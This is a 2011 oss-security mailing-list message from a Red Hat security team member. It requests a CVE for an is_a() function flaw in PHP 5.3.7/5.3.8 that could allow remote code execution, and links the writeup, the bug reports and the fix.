Date: Sat, 24 Sep 2011 07:56:34 -0600 From: Vincent Danen <vdanen@...hat.com> To: oss-security@...ts.openwall.com Cc: security@....net Subject: CVE request: is_a() function may allow arbitrary code execution in PHP 5.3.7/5.3.8 Could a CVE be assigned for this flaw? PHP 5.3.7 changed how the is_a() function worked, and as a result it could allow for remote arbitrary code execution if certain specific conditions are met (the blog post referenced below has a good writeup of the flaw). http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ https://bugs.php.net/bug.php?id=55475 https://bugzilla.redhat.com/show_bug.cgi?id=741020 It looks like this is the fix: http://svn.php.net/viewvc/?view=revision&revision=317183 Thanks. -- Vincent Danen / Red Hat Security Response Team
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.